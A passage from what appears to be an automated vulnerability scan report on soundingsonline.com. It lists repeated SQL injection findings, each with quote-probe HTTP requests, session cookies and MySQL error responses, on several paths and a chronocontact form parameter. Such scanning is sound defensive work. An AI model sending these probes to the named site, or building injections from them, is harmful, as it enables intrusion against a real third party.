HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /calendar?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.57. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/career-opportunities
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /career-opportunities?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /career-opportunities?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.58. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /columns-blogs?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /columns-blogs?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.59. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/bay-tripper
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:42 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.60. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/books
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /columns-blogs/books?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /columns-blogs/books?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.61. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/new-england-fishing
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.62. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/under-way
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /columns-blogs/under-way?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /columns-blogs/under-way?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component'/chronocontact/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component''/chronocontact/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/chronocontact'/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:38 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/chronocontact''/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
